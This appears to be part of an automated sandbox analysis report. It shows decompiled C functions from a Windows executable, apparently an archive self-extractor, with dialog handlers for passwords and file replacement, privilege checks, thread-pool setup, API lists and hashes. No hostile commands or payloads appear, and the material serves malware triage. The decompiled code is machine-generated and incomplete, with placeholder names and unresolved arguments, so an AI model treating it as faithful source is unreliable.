							E00CC2021(_t75, 0x52, _t59 + 0x32,  *((intOrPtr*)(_t66 + 0xc)));
							_t38 = GetLastError();
							E00CC6DCB(0xd01098, _t75);
							if(_t38 == 5 && E00CD07BC() == 0) {
								E00CC15C6(_t66 - 0x6c, 0x18);
								E00CD15FE(_t66 - 0x6c);
							}
							E00CC6D83(0xd01098, 1);
						} else {
							_t45 =  *0xd23000(_t66 - 0x106c, _t63, _t49);
							_t75 = _t45;
							if(_t45 == 0) {
								goto L10;
							}
						}
					}
				}
				_t31 =  *((intOrPtr*)(_t66 - 0x20));
				 *((intOrPtr*)(_t66 - 4)) = 2;
				if(_t31 != 0) {
					if( *((char*)(_t66 - 0x10)) != 0) {
						E00CCF445(_t31,  *((intOrPtr*)(_t66 - 0x18)));
						_t31 =  *((intOrPtr*)(_t66 - 0x20));
					}
					_t31 = L00CE3E2E(_t31);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0xc));
				return _t31;
			}











                                                    0x00cc7401
                                                    0x00cc7401
                                                    0x00cc7406
                                                    0x00cc7410
                                                    0x00cc7418
                                                    0x00cc741b
                                                    0x00cc741e
                                                    0x00cc7421
                                                    0x00cc7424
                                                    0x00cc7427
                                                    0x00cc742c
                                                    0x00cc742d
                                                    0x00cc742e
                                                    0x00cc7434
                                                    0x00cc743c
                                                    0x00cc7449
                                                    0x00cc7457
                                                    0x00cc7459
                                                    0x00cc7459
                                                    0x00cc7465
                                                    0x00cc746a
                                                    0x00cc746a
                                                    0x00cc7478
                                                    0x00cc747b
                                                    0x00cc747c
                                                    0x00cc7480
                                                    0x00cc7480
                                                    0x00cc7481
                                                    0x00cc7482
                                                    0x00cc7485
                                                    0x00cc7486
                                                    0x00cc7487
                                                    0x00cc7492
                                                    0x00cc74aa
                                                    0x00cc74bf
                                                    0x00cc74c8
                                                    0x00cc74cd
                                                    0x00cc74dc
                                                    0x00cc74e4
                                                    0x00cc74f4
                                                    0x00cc74fc
                                                    0x00cc74fc
                                                    0x00cc7505
                                                    0x00cc74ac
                                                    0x00cc74b5
                                                    0x00cc74bb
                                                    0x00cc74bd
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc74bd
                                                    0x00cc74aa
                                                    0x00cc750b
                                                    0x00cc750c
                                                    0x00cc750f
                                                    0x00cc7519
                                                    0x00cc751f
                                                    0x00cc7525
                                                    0x00cc752a
                                                    0x00cc752a
                                                    0x00cc752e
                                                    0x00cc7533
                                                    0x00cc7537
                                                    0x00cc753f

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC7406
                                                      • Part of subcall function 00CC3BBA: __EH_prolog.LIBCMT ref: 00CC3BBF
                                                    • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00CC74CD
                                                      • Part of subcall function 00CC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CC7AAB
                                                      • Part of subcall function 00CC7A9C: GetLastError.KERNEL32 ref: 00CC7AF1
                                                      • Part of subcall function 00CC7A9C: CloseHandle.KERNEL32(?), ref: 00CC7B00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                    • API String ID: 3813983858-639343689
                                                    • Opcode ID: 8bd34e8436e264794c3d6f58d388dfd92d2d6838924bee84590cd5a71185ff5a
                                                    • Instruction ID: 188aa581e67995f5f3629511d3fa2734a79ddb100ec9c1927da82714104cd8d5
                                                    • Opcode Fuzzy Hash: 8bd34e8436e264794c3d6f58d388dfd92d2d6838924bee84590cd5a71185ff5a
                                                    • Instruction Fuzzy Hash: F631CFB1E04248AADF11EBA4DC45FEE7BA8EF09304F04411AF955E7282CB748B45DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E00CDAD10(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t19;
				void* _t22;
				WCHAR** _t24;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E00CC1316(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0xd21cb8 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0xd21cb8), ( *0xd21cb8)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_t19 = E00CCC29A(__eflags,  *( *0xd21cb8));
					_t22 = E00CC1100(_t30, E00CCE617(0x8e),  *( *0xd21cb8), _t19, 0);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0xd21cb8));
					goto L13;
				}
				goto L6;
			}












                                                    0x00cdad11
                                                    0x00cdad16
                                                    0x00cdad1b
                                                    0x00cdad20
                                                    0x00cdad38
                                                    0x00cdadc8
                                                    0x00cdadca
                                                    0x00000000
                                                    0x00cdadca
                                                    0x00cdad3e
                                                    0x00cdad44
                                                    0x00cdadb7
                                                    0x00cdadb9
                                                    0x00cdadbf
                                                    0x00cdadc2
                                                    0x00000000
                                                    0x00cdadc2
                                                    0x00cdad49
                                                    0x00cdad5d
                                                    0x00000000
                                                    0x00cdad5d
                                                    0x00cdad4e
                                                    0x00cdad51
                                                    0x00cdadad
                                                    0x00cdadb3
                                                    0x00cdad97
                                                    0x00cdad98
                                                    0x00000000
                                                    0x00cdad98
                                                    0x00cdad53
                                                    0x00cdad56
                                                    0x00cdad95
                                                    0x00000000
                                                    0x00cdad95
                                                    0x00cdad5b
                                                    0x00cdad6a
                                                    0x00cdad83
                                                    0x00cdad88
                                                    0x00cdad8a
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdad91
                                                    0x00000000
                                                    0x00cdad91
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                      • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                    • EndDialog.USER32(?,00000001), ref: 00CDAD98
                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00CDADAD
                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CDADC2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ItemText$DialogWindow
                                                    • String ID: ASKNEXTVOL
                                                    • API String ID: 445417207-3402441367
                                                    • Opcode ID: 4f7fd26de3b7eb449ec69691b11a22aef88a1b9846ff9ba781f747a0c2bbc9a4
                                                    • Instruction ID: cc704650685552e3f1e95c80671eecb0c997f5ef10ed9885a3715b0a17472647
                                                    • Opcode Fuzzy Hash: 4f7fd26de3b7eb449ec69691b11a22aef88a1b9846ff9ba781f747a0c2bbc9a4
                                                    • Instruction Fuzzy Hash: C011E632244300BFD3219F68DC45F6A7B6AEF6B702F140012F340DB7A0C7619A16A736
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 57%
                                                    			E00CCD8EC(void* __ebx, void* __ecx, void* __edx) {
				void* __esi;
				void* _t22;
				intOrPtr _t26;
				signed int* _t30;
				void* _t33;
				void* _t41;
				void* _t43;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t50;

				_t43 = __edx;
				_t42 = __ecx;
				_t41 = __ebx;
				_t47 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t45 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) <= 0) {
					L12:
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t47 + 0x5c)) =  *((intOrPtr*)(_t47 + 0x6c));
					 *((char*)(_t47 + 8)) = 0;
					 *((intOrPtr*)(_t47 + 0x60)) = _t47 + 8;
					if( *((intOrPtr*)(_t47 + 0x74)) != 0) {
						E00CD1DA7( *((intOrPtr*)(_t47 + 0x74)), _t47 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t47 + 0x70));
					if(_t26 == 0) {
						E00CD05A7(_t47 + 8, "s", 0x50);
					} else {
						_t33 = _t26 - 1;
						if(_t33 == 0) {
							_push(_t47 - 0x48);
							_push("$%s");
							goto L8;
						} else {
							if(_t33 == 1) {
								_push(_t47 - 0x48);
								_push("@%s");
								L8:
								_push(0x50);
								_push(_t47 + 8);
								E00CCE5B1();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t30 = E00CE6159(_t41, _t42, _t43, _t45, _t47 + 0x58,  *((intOrPtr*)(_t45 + 0x14)),  *((intOrPtr*)(_t45 + 0x18)), 4, E00CCD710);
					if(_t30 == 0) {
						goto L12;
					} else {
						_t20 = 0xcfe278 +  *_t30 * 0xc; // 0xcf4788
						E00CE67C0( *((intOrPtr*)(_t47 + 0x78)),  *_t20,  *((intOrPtr*)(_t47 + 0x7c)));
						_t22 = 1;
					}
				}
				return _t22;
			}














                                                    0x00ccd8ec
                                                    0x00ccd8ec
                                                    0x00ccd8ec
                                                    0x00ccd8ed
                                                    0x00ccd8f1
                                                    0x00ccd8f8
                                                    0x00ccd8fe
                                                    0x00ccd9a6
                                                    0x00ccd9a6
                                                    0x00ccd904
                                                    0x00ccd90b
                                                    0x00ccd911
                                                    0x00ccd915
                                                    0x00ccd918
                                                    0x00ccd923
                                                    0x00ccd923
                                                    0x00ccd92b
                                                    0x00ccd92e
                                                    0x00ccd969
                                                    0x00ccd930
                                                    0x00ccd930
                                                    0x00ccd933
                                                    0x00ccd948
                                                    0x00ccd949
                                                    0x00000000
                                                    0x00ccd935
                                                    0x00ccd938
                                                    0x00ccd93d
                                                    0x00ccd93e
                                                    0x00ccd94e
                                                    0x00ccd951
                                                    0x00ccd953
                                                    0x00ccd954
                                                    0x00ccd959
                                                    0x00ccd959
                                                    0x00ccd938
                                                    0x00ccd933
                                                    0x00ccd97f
                                                    0x00ccd989
                                                    0x00000000
                                                    0x00ccd98b
                                                    0x00ccd991
                                                    0x00ccd99a
                                                    0x00ccd9a2
                                                    0x00ccd9a2
                                                    0x00ccd989
                                                    0x00ccd9ad

                                                    APIs
                                                    • __fprintf_l.LIBCMT ref: 00CCD954
                                                    • _strncpy.LIBCMT ref: 00CCD99A
                                                      • Part of subcall function 00CD1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00D01030,?,00CCD928,00000000,?,00000050,00D01030), ref: 00CD1DC4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                    • String ID: $%s$@%s
                                                    • API String ID: 562999700-834177443
                                                    • Opcode ID: fffb9b670144e36ad79af8796852a6b350ace242658858fe7ac7f1abb601be50
                                                    • Instruction ID: 0274a518c89143970607808cef7f5028a4d4a134e9987b1d13970aef3654199f
                                                    • Opcode Fuzzy Hash: fffb9b670144e36ad79af8796852a6b350ace242658858fe7ac7f1abb601be50
                                                    • Instruction Fuzzy Hash: 8B21D23640024CAEDB21EEA4CC05FEE7BA8AF05304F14003AFA26961A2E732D648DB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 69%
                                                    			E00CD0E46(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 <= _t23) {
					if(_t11 == 0) {
						 *__ecx = 1;
						_t11 = 1;
					}
				} else {
					 *__ecx = _t23;
					_t11 = _t23;
				}
				_t25[0x41] = 0;
				if(_t11 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0xd01098);
					E00CC6C31(E00CC6C36(_t19), 0xd01098, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}









                                                    0x00cd0e46
                                                    0x00cd0e46
                                                    0x00cd0e4e
                                                    0x00cd0e54
                                                    0x00cd0e56
                                                    0x00cd0e5a
                                                    0x00cd0e64
                                                    0x00cd0e66
                                                    0x00cd0e68
                                                    0x00cd0e68
                                                    0x00cd0e5c
                                                    0x00cd0e5c
                                                    0x00cd0e5e
                                                    0x00cd0e5e
                                                    0x00cd0e6c
                                                    0x00cd0e74
                                                    0x00cd0e76
                                                    0x00cd0e76
                                                    0x00cd0e78
                                                    0x00cd0e7e
                                                    0x00cd0e85
                                                    0x00cd0e99
                                                    0x00cd0e9f
                                                    0x00cd0ea5
                                                    0x00cd0eb1
                                                    0x00cd0eb7
                                                    0x00cd0ec1
                                                    0x00cd0ecd
                                                    0x00cd0ecd
                                                    0x00cd0ed3
                                                    0x00cd0edb
                                                    0x00cd0ee1
                                                    0x00cd0eea

                                                    APIs
                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00CCAC5A,00000008,?,00000000,?,00CCD22D,?,00000000), ref: 00CD0E85
                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00CCAC5A,00000008,?,00000000,?,00CCD22D,?,00000000), ref: 00CD0E8F
                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00CCAC5A,00000008,?,00000000,?,00CCD22D,?,00000000), ref: 00CD0E9F
                                                    Strings
                                                    • Thread pool initialization failed., xrefs: 00CD0EB7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                    • String ID: Thread pool initialization failed.
                                                    • API String ID: 3340455307-2182114853
                                                    • Opcode ID: a39a467b776d239ef7708b2e5b6afb396b4ad9f147f6d44ab5fd2cedede24df0
                                                    • Instruction ID: 97ad0850874dbaa98724dc38d05bf599b53ec3004bf86be774cf0e2cab7761d1
                                                    • Opcode Fuzzy Hash: a39a467b776d239ef7708b2e5b6afb396b4ad9f147f6d44ab5fd2cedede24df0
                                                    • Instruction Fuzzy Hash: 401142B1640708ABC3215F6ADD84BABFBDCEB55754F604C2FE1DA82600DA715A408B64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E00CDB270(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E00CC1316(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E00CCF3FA(_t24, 0xd17a78,  &_v260);
					E00CCF445( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                                                    0x00cdb27a
                                                    0x00cdb27e
                                                    0x00cdb282
                                                    0x00cdb29b
                                                    0x00cdb30a
                                                    0x00000000
                                                    0x00cdb30c
                                                    0x00cdb29d
                                                    0x00cdb2a3
                                                    0x00cdb304
                                                    0x00000000
                                                    0x00cdb304
                                                    0x00cdb2a8
                                                    0x00cdb2b7
                                                    0x00000000
                                                    0x00cdb2b7
                                                    0x00cdb2ad
                                                    0x00cdb2b0
                                                    0x00cdb2d6
                                                    0x00cdb2e8
                                                    0x00cdb2f5
                                                    0x00cdb2fa
                                                    0x00cdb2bd
                                                    0x00cdb2be
                                                    0x00000000
                                                    0x00cdb2be
                                                    0x00cdb2b5
                                                    0x00cdb2bb
                                                    0x00000000
                                                    0x00cdb2bb
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                      • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                    • EndDialog.USER32(?,00000001), ref: 00CDB2BE
                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00CDB2D6
                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CDB304
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ItemText$DialogWindow
                                                    • String ID: GETPASSWORD1
                                                    • API String ID: 445417207-3292211884
                                                    • Opcode ID: 48d604af2611a5abb98cd81eb5f4ee9a982cf7e194b66ccb5869281fd459613f
                                                    • Instruction ID: c7221fe594dd634d5d2a45dcb1690ea2d37d1b81955fa36b69429dd7b21a9f41
                                                    • Opcode Fuzzy Hash: 48d604af2611a5abb98cd81eb5f4ee9a982cf7e194b66ccb5869281fd459613f
                                                    • Instruction Fuzzy Hash: 2711E133A00219B6DB229E659D49FFF3B6DEF19710F010026FB45F2294CBA49E42A771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDDCDD(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _t15;
				_Unknown_base(*)()* _t19;
				int _t22;

				 *0xd1ec88 = _a12;
				 *0xd1ec8c = _a16;
				 *0xd08464 = _a20;
				if( *0xd08460 == 0) {
					if( *0xd08457 == 0) {
						_t19 = E00CDC220;
						_t15 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0xd0102c, _t15,  *0xd08458, _t19, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0xd01028, L"RENAMEDLG",  *0xd08450, E00CDD600, _a4) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}






                                                    0x00cddced
                                                    0x00cddcf5
                                                    0x00cddcfb
                                                    0x00cddd00
                                                    0x00cddd0d
                                                    0x00cddd17
                                                    0x00cddd1c
                                                    0x00cddd46
                                                    0x00cddd5d
                                                    0x00cddd62
                                                    0x00000000
                                                    0x00000000
                                                    0x00cddd44
                                                    0x00000000
                                                    0x00000000
                                                    0x00cddd44
                                                    0x00000000
                                                    0x00cddd68
                                                    0x00000000
                                                    0x00cddd11
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                    • API String ID: 0-56093855
                                                    • Opcode ID: 89fb3c0082389b842e2146e0e58348068130b5a04f0ab08ec6c6e778796e487c
                                                    • Instruction ID: e9fe8f77a215942595a19e01174b8880244a9ccddcead5f9cf2163045053ea26
                                                    • Opcode Fuzzy Hash: 89fb3c0082389b842e2146e0e58348068130b5a04f0ab08ec6c6e778796e487c
                                                    • Instruction Fuzzy Hash: 4A015E76A04349AFDB118F55FC44AAB7BAAE708354B10442AFA4BC2331CA31D951EBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E00CE9A1E(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00CE4636(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00CDEE10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
